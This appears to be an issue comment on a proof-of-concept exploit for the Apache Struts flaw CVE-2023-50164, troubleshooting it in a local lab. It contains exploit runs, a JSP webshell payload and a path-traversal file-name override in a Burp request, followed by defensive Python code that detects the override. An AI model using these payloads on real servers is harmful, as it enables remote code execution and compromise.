Thank you for creating this test exploit. I followed all your steps, but I am not getting the shell. It keeps on failing at "Maximum attempts reached. Exiting..."
What I have tried so far:
Ran application using:
┌──(kali㉿kali)-[~/CVE-2023-50164-Apache-Struts-RCE/struts-app]
└─$ sudo mvn jetty:run
┌──(kali㉿kali)-[~/CVE-2023-50164-Apache-Struts-RCE/exploit]
└─$ python exploit.py --url http://0.0.0.0:9999/upload/upload.action
[+] Starting exploitation...
[+] WAR file already exists.
[+] webshell.war uploaded successfully.
[+] Reach the JSP webshell at http://0.0.0.0:9999/webshell/webshell.jsp?cmd=<COMMAND>
[+] Attempting a connection with webshell.
[-] Maximum attempts reached. Exiting...
FROM tomcat:9.0.84-jre21-temurin-jammy
WORKDIR $CATALINA_HOME/webapps
ADD struts-app/target/upload-1.0.0.war ROOT.war
EXPOSE 8080
CMD ["catalina.sh", "run"]
sudo docker build -t exploitable -f DOCKERFILE .
sudo docker run -p 8080:8080 exploitable
┌──(kali㉿kali)-[~/CVE-2023-50164-Apache-Struts-RCE/exploit]
└─$ python exploit.py --url http://localhost:8080/upload.action
[+] Starting exploitation...
[+] WAR file already exists.
[+] webshell.war uploaded successfully.
[+] Reach the JSP webshell at http://localhost:8080/webshell/webshell.jsp?cmd=<COMMAND>
[+] Attempting a connection with webshell.
[-] Maximum attempts reached. Exiting...
Furthermore, I have tried to exploit it manually and it's still not uploading the file.
Here is the payload I used in Burp:
POST /upload.action HTTP/1.1
Host: localhost:8080
Content-Length: 655
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrGpRBHBc0EPTTB4o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/upload.action
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=443CC7117FB5529DA2FC9A32731D8929
Connection: close
------WebKitFormBoundaryrGpRBHBc0EPTTB4o
Content-Disposition: form-data; name="upload"; filename="cat.jpg"
Content-Type: image/jpeg
<%@ page import="java.util.*,java.io.*"%>
<pre>
<%
Process p = Runtime.getRuntime().exec("/bin/id");
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while (disr != null) {
out.println(disr);
disr = dis.readLine();
}
%>
</pre>
------WebKitFormBoundaryrGpRBHBc0EPTTB4o
Content-Disposition: form-data; name="uploadFileName";
../shell.jsp
------WebKitFormBoundaryrGpRBHBc0EPTTB4o--
I would be very thankful if you can let me know what mistake I am making here or anything I am missing before running this exploit. Thank you.
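An added example from the defender's side, not code from this issue or from the exploit repository: a small Python check that parses a multipart body shaped like the Burp request above and flags the file-name override pattern it relies on (a text field whose name ends in `FileName`, carrying a path traversal, next to a real file part). The boundary, field names and sample body are constructed from the request shown; the file bytes are a placeholder.

```python
import re

# Constructed sample: same boundary and field names as the request above,
# with placeholder bytes in place of the uploaded file content.
BOUNDARY = "----WebKitFormBoundaryrGpRBHBc0EPTTB4o"
SAMPLE_BODY = (
    b"------WebKitFormBoundaryrGpRBHBc0EPTTB4o\r\n"
    b'Content-Disposition: form-data; name="upload"; filename="cat.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff placeholder bytes\r\n"
    b"------WebKitFormBoundaryrGpRBHBc0EPTTB4o\r\n"
    b'Content-Disposition: form-data; name="uploadFileName";\r\n\r\n'
    b"../shell.jsp\r\n"
    b"------WebKitFormBoundaryrGpRBHBc0EPTTB4o--\r\n"
)

# A ".." path component at the start, middle or end of a value.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into parts: name, filename, data."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disp = ""
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            if key.strip().lower() == "content-disposition":
                disp = value
        name = re.search(r'name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({"name": name.group(1) if name else None,
                      "filename": fname.group(1) if fname else None,
                      "data": data.rstrip(b"\r\n")})
    return parts


def find_upload_tampering(parts: list) -> list:
    """Return findings for traversal in a filename or in a *FileName text field."""
    findings = []
    has_file_part = any(p["filename"] is not None for p in parts)
    for p in parts:
        name = p["name"] or ""
        if p["filename"] is not None and TRAVERSAL.search(p["filename"]):
            findings.append(f"traversal in filename of field '{name}': {p['filename']}")
        elif has_file_part and name.lower().endswith("filename"):
            value = p["data"].decode("latin-1")
            if TRAVERSAL.search(value) or value.lower().endswith(".jsp"):
                findings.append(f"file-name override via text field '{name}': {value}")
    return findings
```

Run against `SAMPLE_BODY` the check reports the `uploadFileName` field as a file-name override; the same parser can be pointed at captured request bodies from a proxy or WAF log.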